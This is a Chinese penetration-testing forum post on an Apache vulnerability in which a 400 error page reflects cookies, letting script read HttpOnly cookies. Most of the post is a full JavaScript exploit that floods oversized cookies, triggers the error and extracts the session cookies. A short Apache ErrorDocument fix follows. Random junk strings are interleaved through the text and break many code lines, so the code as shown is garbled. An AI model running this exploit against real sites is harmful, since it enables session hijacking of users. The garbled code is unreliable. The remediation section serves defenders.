中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]

作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。8 Q$ V8 D' N- j3 Y! l

* |0 a- V5 O  }% u/ U: w6 X; _% `用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
/ D/ m4 \# A9 l/ g/ X4 x # l9 l. g% E( S* ?, ^6 J$ J
+ O/ y; f4 g5 w- u5 P
// http://www.exploit-db.com/exploits/18442/
+ t% h4 Z& ?9 C+ _5 cfunction setCookies (good) {0 i/ }0 k  {: G4 n
// Construct string for cookie value
+ p& D' V* N! |5 |, e' Nvar str = "";  s# ]$ I) c: A+ Q( s8 h% G3 [0 y$ e
for (var i=0; i< 819; i++) {5 m0 V: o$ K: L5 I- f7 q% R8 Z
str += "x";
1 e1 O9 y# i& |1 A# t" v  b2 p% _/ G- {}
" u" e8 n: u6 c+ K# `// Set cookies
) w) T; \' C: |6 G2 E; ^( tfor (i = 0; i < 10; i++) {7 i4 ^, ^. a8 @* q
// Expire evil cookie, o9 Q( J( B" P# F' R
if (good) {% [/ P) e& r/ l' R
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
4 V' N" W- g' h- `' ?, `+ J}( k: R& J2 L  Q2 ^. w# e4 w
// Set evil cookie" U# F# a) K. H' u) u# x! j
else {: t% j4 t* v/ ^
var cookie = "xss"+i+"="+str+";path=/";
" F7 q% W' X9 [+ c, I5 o# ]; o# {}
7 K8 o! V9 h" B( vdocument.cookie = cookie;( M+ Z2 L& t; h% b% \/ r% i
}
5 z5 ~0 M/ Z. V$ u- L}
+ \) E+ l0 s( M; Q, O$ ]7 @) vfunction makeRequest() {
  o9 w; u3 O% J" W0 h: usetCookies();
2 u4 G) a$ G0 ]9 l' t, _function parseCookies () {
( ]- H" e2 M  ~2 Y8 b  Tvar cookie_dict = {};; e2 H" p$ O" R: `' x3 K
// Only react on 400 status
8 C" |: y( Q/ C# |if (xhr.readyState === 4 && xhr.status === 400) {- n) u3 E* X. c" c9 [" s
// Replace newlines and match <pre> content% c/ B5 y! Y$ r/ n1 _
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
* Y' |+ E4 f/ z2 p, x9 S) ]1 Qif (content.length) {% L3 U0 w! `3 g' @% G0 e4 |, l
// Remove Cookie: prefix9 F3 X7 j: a( f( G  ~
content = content[1].replace("Cookie: ", "");# H3 W: L$ x+ Y1 t, o
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);& l3 w, N: F  R( h1 Q. v. S
// Add cookies to object1 j8 }8 _/ \! q- \& m& n3 M3 k1 ~
for (var i=0; i<cookies.length; i++) {: e4 ~( I% v5 i( d
var s_c = cookies.split('=',2);
* h# Q$ L0 R& N! ~cookie_dict[s_c[0]] = s_c[1];
: c8 }9 A# L# I3 g9 u8 ~7 C( [& M4 h}
. `/ `9 m$ O4 \6 ~7 W8 V) G: D" q2 {}
5 h( W" ?4 x9 l$ q' N// Unset malicious cookies5 n0 o3 [0 Y$ V8 ?0 I
setCookies(true);) Z+ Q/ _8 \) U5 @
alert(JSON.stringify(cookie_dict));
7 K6 w" d, r! o/ N2 C}
# `& c9 ?! u8 }: |, J' G8 f. ]}. a; l* p1 u* N# |  Y
// Make XHR request
& W/ i' q2 j. g  Yvar xhr = new XMLHttpRequest();
+ F/ K. w$ C' V; `# Y1 Gxhr.onreadystatechange = parseCookies;7 t! Z: ~! x5 S+ y8 G! |
xhr.open("GET", "/", true);
9 |4 f9 b+ c: {5 u) D2 Qxhr.send(null);6 F# ~3 ]9 f6 u" T3 d
}
5 N+ p# {# Q  w- M$ ?makeRequest();8 \) [. i) ~: |) A/ g' X0 @) B: x( k

6 m5 D* b0 [# A& M你就能看见华丽丽的400错误包含着cookie信息。: S2 @4 t4 ^3 A$ `& |* \" o

1 ?8 {, |2 |6 p+ h下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#7 l# `# m. Y+ o9 {  H
5 D2 Z! p1 f3 [4 C8 W
修复方案:5 X$ I' ~0 p8 V
6 G6 C# L) p* S9 `/ Z8 `) h
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
) p; G% p) h1 F( j
/ Q1 R5 }+ V' \2 ^In the event of a problem or error, Apachecan be configured to do one of four things,, a) w+ B2 \8 M; L

: W7 |: M4 i1 Q- `1 N! b, [& I8 t3 d: _1. output asimple hardcoded error message输出一个简单生硬的错误代码信息" R% ?  b* @9 d. O8 [. g  e& r
2. output acustomized message输出一段信息; q% E3 \% D, u" E) R
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
. U' U2 n5 q" \, L# p3 ~4. redirect to an external URL to handle theproblem/error转向一个外部URL
0 z8 {$ ^0 l3 J7 b; |" f
0 W5 @. C4 @6 ]7 L经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
9 c1 |5 l1 n) ~& F
2 u" }8 s- Z" L& [% sApache配置:( _* t. j# ]8 e9 L* m/ t! _
1 Z' L/ f8 Y- S- ^; b* P
ErrorDocument400 " security test"2 p8 g: K7 R- \

- x+ I( w. ]1 S- W3 ^5 o当然,升级apache到最新也可:)。" x! D& t! Y5 G" s7 u
' \" P5 L; {) ]  ^9 `+ z
参考:http://httpd.apache.org/security/vulnerabilities_22.html+ [1 q$ C9 C9 x4 d

9 C( Q# b9 h. z, R




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2